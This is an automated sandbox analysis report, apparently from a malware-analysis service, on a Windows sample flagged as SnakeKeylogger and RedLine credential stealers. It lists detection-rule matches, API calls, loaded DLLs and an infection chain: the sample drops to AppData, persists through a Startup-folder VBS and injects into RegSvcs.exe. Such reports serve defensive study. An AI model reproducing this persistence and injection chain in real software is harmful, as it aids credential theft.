                  Source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.nonplacental.exe.3b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000005.00000002.2197923866.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000002.00000002.2081325248.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103A06A GetLastError,FormatMessageW,0_2_0103A06A
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010281CB AdjustTokenPrivileges,CloseHandle,0_2_010281CB
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_010287E1
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006481CB AdjustTokenPrivileges,CloseHandle,2_2_006481CB
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006487E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_006487E1
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0103B333
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0104EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0104EE0D
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0103C397
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FD4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00FD4E89
                  Source: C:\Users\user\Desktop\ref_97024130865.exeFile created: C:\Users\user\AppData\Local\juvenileJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\ref_97024130865.exeFile created: C:\Users\user\AppData\Local\Temp\autCACC.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs"
                  Source: ref_97024130865.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003DFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002EDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: ref_97024130865.exeReversingLabs: Detection: 73%
                  Source: C:\Users\user\Desktop\ref_97024130865.exeFile read: C:\Users\user\Desktop\ref_97024130865.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\ref_97024130865.exe "C:\Users\user\Desktop\ref_97024130865.exe"
                  Source: C:\Users\user\Desktop\ref_97024130865.exeProcess created: C:\Users\user\AppData\Local\juvenile\nonplacental.exe "C:\Users\user\Desktop\ref_97024130865.exe"
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\ref_97024130865.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\juvenile\nonplacental.exe "C:\Users\user\AppData\Local\juvenile\nonplacental.exe"
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\juvenile\nonplacental.exe"
                  Source: C:\Users\user\Desktop\ref_97024130865.exeProcess created: C:\Users\user\AppData\Local\juvenile\nonplacental.exe "C:\Users\user\Desktop\ref_97024130865.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\ref_97024130865.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\juvenile\nonplacental.exe "C:\Users\user\AppData\Local\juvenile\nonplacental.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\juvenile\nonplacental.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: kernel.appcore.dllJump to behavior
